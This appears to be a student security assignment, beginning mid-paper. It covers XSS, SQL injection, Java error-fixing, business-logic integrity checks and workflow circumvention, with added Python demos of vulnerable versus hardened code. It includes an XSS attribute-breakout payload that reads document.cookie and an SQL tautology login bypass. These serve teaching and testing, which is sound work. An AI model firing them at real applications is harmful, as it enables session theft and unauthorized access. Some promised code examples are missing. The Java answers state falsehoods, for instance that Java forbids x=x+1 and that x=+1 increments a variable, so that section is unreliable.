Running Head: Input Validation and Business Logic Security Controls 1
Name of Author
Institutional Affiliation
Date of Submission
Example 2
Another way is to have the user download a malicious executable file supplied by the tester
through a third-party website link. The extension file then grants the tester access to the browser.
Example 3
Another way is to bypass the filter on tag attribute values. The filters are blacklist-based and
thus cannot block every type of expression. Where the web application places the input inside a
simple input tag attribute, the tester could just provide the code below:
" onfocus="alert(document.cookie)
Example 4
Use alternative syntax to evade signature-based filters, which are easily defeated. Both
encoding variations are accepted by browsers as valid HTML.
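As an added example (not code from the original paper), the Python snippet below contrasts a blacklist filter of the kind Examples 3 and 4 describe with attribute-context output encoding, using the Example 3 payload as input; the blacklisted tag names and the input element are constructed for illustration.

```python
import html
import re

# Constructed example, not from the original paper: a blacklist filter of the
# kind described in Example 3, beside contextual output encoding.

# Blacklist filter: strips a few well-known tags. It cannot enumerate every
# expression, so an attribute-breakout payload passes straight through.
BLACKLIST = re.compile(r"</?(script|img|iframe|svg)\b[^>]*>", re.IGNORECASE)

def blacklist_filter(value: str) -> str:
    return BLACKLIST.sub("", value)

def render_filtered(value: str) -> str:
    # Vulnerable: the filtered value is dropped into an attribute unencoded.
    return '<input type="text" name="q" value="%s">' % blacklist_filter(value)

def render_encoded(value: str) -> str:
    # Hardened: encode for the attribute context; quote=True turns " into &quot;
    return '<input type="text" name="q" value="%s">' % html.escape(value, quote=True)

# Did the input stay inside the one quoted attribute it was meant to fill?
ATTR_RE = re.compile(r'^<input type="text" name="q" value="([^"]*)">$')

def attribute_intact(markup: str) -> bool:
    return ATTR_RE.match(markup) is not None

# Payload from the paper's Example 3 (the leading quote closes value="").
PAYLOAD = '" onfocus="alert(document.cookie)'

if __name__ == "__main__":
    for name, render in (("blacklist", render_filtered), ("encoded", render_encoded)):
        out = render(PAYLOAD)
        print(f"{name:9s} intact={attribute_intact(out)}  {out}")
```

Only the encoded rendering keeps the payload inside the attribute value; the blacklist never sees anything it recognises.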
2). Stored cross-site scripting is a vulnerability affecting applications that store user-supplied
data. It is considered one of the most dangerous types of cross-site scripting. Because the web
application stores user input, incorrectly filtered input becomes a permanent part of the website.
The vulnerability does, however, rely on two requests to and from the application.
Example 1
Simply use the HTML input tag syntax to inject code outside of it. An example is shown
below:
Example 2
Another way involves the tester exercising both the filtering controls and the validation associated
with the application. Using JavaScript, the example injection would look like the one below, complete
with HTML tags.
3). A form that includes the provided code would be susceptible to an SQL injection attack
simply because an attacker can supply crafted input that makes the original statement
perform actions beyond what it was meant to do.
To determine whether the application is vulnerable, simply perform the tests below on it:
Perform a classical SQL injection by providing default values of one to check whether the application
allows entry without actual credentials.
Use a simple SELECT statement in SQL to play with the logic of the application and see
whether it is vulnerable.
The easiest way to avoid this attack is simply not to construct a query directly from user input.
Although this works against some injection attacks, it is useless against others.
Result = RunQuery("SELECT * FROM Students WHERE EMPLID=? AND EMAIL=?")
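Added example, not from the original paper: the question 3 lookup built both ways against an in-memory SQLite database, so the concatenated and the placeholder (?) forms can be compared on the same input; the Students rows and the tautology input are constructed for illustration.

```python
import sqlite3

# Constructed example, not from the original paper: the Students lookup from
# question 3 built two ways against an in-memory SQLite database.

def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Students (EMPLID TEXT, EMAIL TEXT)")
    conn.executemany("INSERT INTO Students VALUES (?, ?)",
                     [("1001", "ann@example.edu"), ("1002", "bob@example.edu")])
    return conn

def lookup_concat(conn, emplid: str, email: str) -> list:
    # Vulnerable: user input is pasted into the statement text, so the input
    # can change the statement's logic instead of just supplying values.
    sql = ("SELECT * FROM Students WHERE EMPLID='" + emplid +
           "' AND EMAIL='" + email + "'")
    return conn.execute(sql).fetchall()

def lookup_param(conn, emplid: str, email: str) -> list:
    # Hardened: the statement text is fixed; the driver binds the values, so
    # whatever the input contains is compared literally against the columns.
    sql = "SELECT * FROM Students WHERE EMPLID=? AND EMAIL=?"
    return conn.execute(sql, (emplid, email)).fetchall()

# The paper's "classical" test: a tautology in place of real credentials.
TAUTOLOGY = "' OR '1'='1"

if __name__ == "__main__":
    db = make_db()
    print("concatenated query rows:", len(lookup_concat(db, TAUTOLOGY, TAUTOLOGY)))
    print("parameterised query rows:", len(lookup_param(db, TAUTOLOGY, TAUTOLOGY)))
    print("genuine credentials rows:", len(lookup_param(db, "1001", "ann@example.edu")))
```

With the tautology as input the concatenated form returns every student, while the parameterised form returns none because the text is matched literally.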
4). a) This program would raise a "variable not declared" error. Java does not allow programmers
to set the increment of a variable using the variable itself, i.e. x=x+1. Java only supports the x++ or
x=+1 format. The fixed code is shown below:
int x;
x=+1;
System.out.println("X = " + x);
b) Two errors exist here. First, the variable "i" is not initialized, which raises a concern. Secondly,
the semicolon directly after the closing bracket of the for loop terminates the statement before
the inner block executes. To fix this, simply rewrite it as shown below:
for (int i=1; i<=5; i++) {
System.out.println("Number is " + i);
}
c) The issue here is that the variables are not initialized. Running the program as is would
produce an error. The simplest solution is to declare the variables and assign them values, or rely
on user input.
int z=5;
int d=3;
if (z > d) { // no semicolon after the condition, otherwise the block runs unconditionally
System.out.println("Z is bigger");
}
d) The error is due to the use of quotation marks not supported by the Java language encoding. To
solve this, remove the Greek quotation marks and replace them with regular quotation marks.
String m1="one";
String m2="two";
if (m1.equals(m2)) { // compare string contents; == would compare object references
System.out.println("M1 is equal to M2");
}
e) The error here is that the result of the calculation is not provided to the user. It is common
programming knowledge to provide an output. Furthermore, the area variable computation is
simply wrong since it does not follow the rules of BODMAS. To get the correct result after the
computation, it is advised to use brackets where necessary. In Java, we use System.out to
print the result of the area computation.
double area;
double base1 = 2.3;
double base2 = 4.8;
double height = 12.5;
area =(( base1 + base2)/2.0) * height;
System.out.println("The area of the Trapezoid is: "+area);
5) Business logic errors are ways in which the core logic of a website or application, which defines
data creation, manipulation and storage, is interfered with. These errors can be very harmful to
an organization since they disrupt the application's process flow, which in turn brings about
losses. The major reason to perform integrity checks is to ensure that attackers do not tamper with
and alter application data, causing the data to lose its integrity. Two integrity checks would be
data validation and data verification. To check data verification, a proxy can be used to try to
access a server with fake credentials. The invalid credentials should be checked against existing
ones. To test data validity, simply attempt insertion, deletion or updating of data to check
behavior in accordance with the business logic workflow.
6) Testing for circumvention of the workflow involves making sure an application does not allow actions
outside the approved business process flow. It aims to ensure that all actions stay within the
business process by testing whether the correct sequence can be bypassed. This is important as it prevents
circumvention of important application sections that would otherwise allow users to complete an action
without going through the correct business process. One example of circumvention is a buyer
exploiting the loyalty points awarded to their account when making purchases: they can
simply cancel the transaction and still keep the points without purchasing the product. Another is
an electronic bulletin board that allows users to edit posts after they have been compared to a blacklist;
the post owners can then simply add the blacklisted words. Testing includes:
Start a transaction through the application to the user's account, then cancel the
transaction so that the point values should be decreased. Finally, check the points system to
ensure that the points are recorded correctly.
On a bulletin board, enter and save valid initial text values. Try to append, edit and remove data
in ways that make the existing data invalid. Invalid data may be specific words like.
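Added example, not from the original paper: a small Python model of the loyalty-points workflow from question 6, with the flawed ordering (points granted at placement, never revoked) beside a version that ties the award to the order's final state, and a helper that runs the "start a transaction, cancel it, read the balance" test from the list above. Class names, order states and amounts are constructed for illustration.

```python
# Constructed example, not from the original paper: a minimal order/loyalty
# model showing the cancel-and-keep-the-points flaw from question 6 beside a
# version that ties the award to the order's final state.

class Account:
    def __init__(self):
        self.points = 0
        self.orders = {}   # order_id -> (state, amount)

class FlawedShop:
    """Points are awarded when the order is placed; cancelling never revokes them."""
    def place_order(self, acct, order_id, amount):
        acct.orders[order_id] = ("placed", amount)
        acct.points += amount                  # awarded before the purchase is final
    def complete_order(self, acct, order_id):
        acct.orders[order_id] = ("completed", acct.orders[order_id][1])
    def cancel_order(self, acct, order_id):
        acct.orders[order_id] = ("cancelled", acct.orders[order_id][1])

class FixedShop:
    """Points are earned only on completion; cancelling a completed order
    (a refund) takes them back, so the balance always matches real purchases."""
    def place_order(self, acct, order_id, amount):
        acct.orders[order_id] = ("placed", amount)
    def complete_order(self, acct, order_id):
        state, amount = acct.orders[order_id]
        if state != "placed":                  # enforce the sequence placed -> completed
            raise ValueError("only a placed order can be completed")
        acct.orders[order_id] = ("completed", amount)
        acct.points += amount
    def cancel_order(self, acct, order_id):
        state, amount = acct.orders[order_id]
        if state == "completed":
            acct.points -= amount
        acct.orders[order_id] = ("cancelled", amount)

def run_workflow(shop, steps, amount=40):
    """Place an order on a fresh account, apply the named steps, return the balance."""
    acct = Account()
    shop.place_order(acct, "o1", amount)
    for step in steps:
        getattr(shop, step)(acct, "o1")
    return acct.points

if __name__ == "__main__":
    for shop in (FlawedShop(), FixedShop()):
        print(type(shop).__name__,
              "cancel:", run_workflow(shop, ["cancel_order"]),
              "complete+cancel:", run_workflow(shop, ["complete_order", "cancel_order"]),
              "complete:", run_workflow(shop, ["complete_order"]))
```

A cancelled order should leave the balance at zero; the flawed shop reports 40 points for a purchase that never happened.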